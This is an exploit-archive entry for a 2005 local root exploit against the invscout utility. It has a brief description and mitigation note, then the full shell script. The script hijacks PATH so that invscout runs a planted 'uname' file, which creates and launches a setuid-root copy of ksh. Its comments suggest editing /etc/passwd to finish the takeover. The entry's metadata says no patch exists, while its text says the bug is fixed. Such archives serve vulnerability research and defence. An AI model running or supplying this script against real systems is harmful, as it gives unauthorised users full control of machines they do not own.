r00t exploit for invscout bug

vendor:

invscout

by:

ri0t

7.5

CVSS

HIGH

invscout bug

CWE

Product Name: invscout

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2005

r00t exploit for invscout bug

This exploit takes advantage of the invscout bug reported by Idefense labs. It allows an attacker to gain root access by exploiting a vulnerability in the invscout software. The exploit script automates the process of gaining root access. The exploit involves copying the ksh binary to /tmp, changing its ownership to root:system, giving it execute and setuid permissions, and then executing it. This allows the attacker to gain root access. The exploit was coded by ri0t and can be found on www.ri0tnet.net.

Mitigation:

The invscout bug has been fixed in later versions of the software. It is recommended to update to the latest version to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/sh
# r00t exploit written for the invscout bug reported by Idefense labs
# http://www.idefense.com/application/poi/display?id=171&type=vulnerabilities
# coded by ri0t exploitation is trivial but automated with this script
# www.ri0tnet.net
#
# usage ./getr00t.sh :)
# exploitation gives euid(root) from here getting guid (root) is as simple as an
# /etc/passwd edit 


cd /tmp
echo '/usr/bin/cp /usr/bin/ksh ./' > uname
echo '/usr/bin/chown root:system ./ksh' >> uname
echo '/usr/bin/chmod 777 ./ksh' >> uname
echo '/usr/bin/chmod +s ./ksh' >> uname
/usr/bin/chmod 777 uname
PATH=./
export PATH
/usr/sbin/invscout
PATH="/usr/bin:/usr/sbin:/usr/local/bin:/bin:./"
export PATH
exec /tmp/ksh

# milw0rm.com [2005-03-25]